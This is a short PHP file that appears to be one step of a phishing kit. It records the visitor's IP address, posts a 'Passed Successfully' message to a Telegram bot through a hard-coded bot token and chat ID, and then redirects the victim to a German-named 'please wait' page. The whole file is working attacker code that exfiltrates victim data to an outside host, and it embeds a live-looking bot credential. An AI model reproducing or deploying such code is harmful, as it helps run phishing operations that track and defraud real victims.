<?php
$IP = getenv("REMOTE_ADDR");
$message .= "----------[Successfully]---------\n";
$message .= " Passed Successfully \n";
$message .= "$IP\n";
$message .= "-------------------------------\n";


        // Define your bot tokens
        file_get_contents("https://api.telegram.org/bot8230036797:AAEn7vvHrk5SF628aV7IfxBm2dujlmF-tPo/sendMessage?chat_id=-4857187582&text=" . urlencode($message)."" );

header("Location: ../Bitte/Warten-4.php");

        
?>